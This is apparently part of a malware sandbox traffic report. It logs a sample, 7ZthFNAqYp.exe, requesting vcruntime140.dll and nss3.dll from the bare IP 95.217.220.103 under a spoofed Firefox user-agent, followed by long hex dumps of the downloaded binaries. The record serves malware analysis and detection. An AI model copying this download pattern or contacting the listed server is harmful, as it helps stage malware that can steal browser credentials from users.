                                                                                                                                                                                                            2024-10-23 05:03:52 UTC16384INData Raw: 7d 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00
                                                                                                                                                                                                            Data Ascii: }jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                                                                                                                            2024-10-23 05:03:52 UTC16384INData Raw: 8b 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50
                                                                                                                                                                                                            Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                                                                                                                            2024-10-23 05:03:52 UTC16384INData Raw: f9 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f
                                                                                                                                                                                                            Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                                                                                                            2024-10-23 05:03:52 UTC16384INData Raw: 85 c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84
                                                                                                                                                                                                            Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!
                                                                                                                                                                                                            2024-10-23 05:03:52 UTC16384INData Raw: 5e 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01
                                                                                                                                                                                                            Data Ascii: ^_[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                                                                                                                                            2024-10-23 05:03:52 UTC16384INData Raw: 74 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00
                                                                                                                                                                                                            Data Ascii: twu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                                                            2024-10-23 05:03:52 UTC16384INData Raw: 8b 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84
                                                                                                                                                                                                            Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                                                            2024-10-23 05:03:52 UTC16384INData Raw: 00 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff
                                                                                                                                                                                                            Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                                                                            2024-10-23 05:03:52 UTC16384INData Raw: eb e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb
                                                                                                                                                                                                            Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            16192.168.2.65000695.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:53 UTC203OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:53 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:53 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 80880
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Wednesday, 23-Oct-2024 05:03:53 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-10-23 05:03:53 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                            2024-10-23 05:03:53 UTC16384INData Raw: 02 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46
                                                                                                                                                                                                            Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                                                                                                                            2024-10-23 05:03:54 UTC16384INData Raw: 00 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8
                                                                                                                                                                                                            Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                                                                                                                            2024-10-23 05:03:54 UTC16384INData Raw: 8b d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d
                                                                                                                                                                                                            Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                                                                                                            2024-10-23 05:03:54 UTC15606INData Raw: 4e 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72
                                                                                                                                                                                                            Data Ascii: NT@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicr


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            17192.168.2.65000795.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:55 UTC195OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:55 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:55 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 2046288
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Wednesday, 23-Oct-2024 05:03:55 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-10-23 05:03:55 UTC16120INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                            2024-10-23 05:03:55 UTC16384INData Raw: ee 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41
                                                                                                                                                                                                            Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                                                                                                            2024-10-23 05:03:55 UTC16384INData Raw: 68 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b
                                                                                                                                                                                                            Data Ascii: hRQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$
                                                                                                                                                                                                            2024-10-23 05:03:56 UTC16384INData Raw: 77 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e
                                                                                                                                                                                                            Data Ascii: w@@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                                                                                                            2024-10-23 05:03:56 UTC16384INData Raw: ff ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14
                                                                                                                                                                                                            Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
